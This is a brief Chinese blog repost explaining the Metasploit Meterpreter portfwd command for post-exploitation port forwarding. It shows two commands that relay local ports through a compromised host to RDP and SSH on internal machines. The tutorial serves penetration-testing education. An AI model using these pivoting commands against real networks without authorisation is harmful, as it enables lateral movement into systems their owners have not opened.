ICode9

精准搜索请尝试: 精确搜索
首页 > 编程语言> 文章详细

metasploit后渗透 之 portfwd端口重定向

2021-04-14 18:02:01  阅读:264  来源: 互联网

标签:metasploit 100.30 22 端口 3389 100.253 portfwd 172.16


meterpreter > portfwd add -l 3333 -p 3389 -r 172.16.100.30
[*] Local TCP relay created: :3333 <-> 172.16.100.30:3389

该命令的意义是,将本地的3333端口的数据转发到远端172.16.100.30的3389端口上去(172.16.100.30是受控机);

 

当然也可以通过受控机将数据转发到内网的其他端口,如下:

meterpreter > portfwd add -l 3334 -p 22 -r 172.16.100.253
[*] Local TCP relay created: :3334 <-> 172.16.100.253:22

该命令的意义是,将本地的3334端口的数据转发到远端172.16.100.253的22端口上去(172.16.100.30是受控机);

 

标签:metasploit,100.30,22,端口,3389,100.253,portfwd,172.16
来源: https://www.cnblogs.com/yyxianren/p/14659145.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有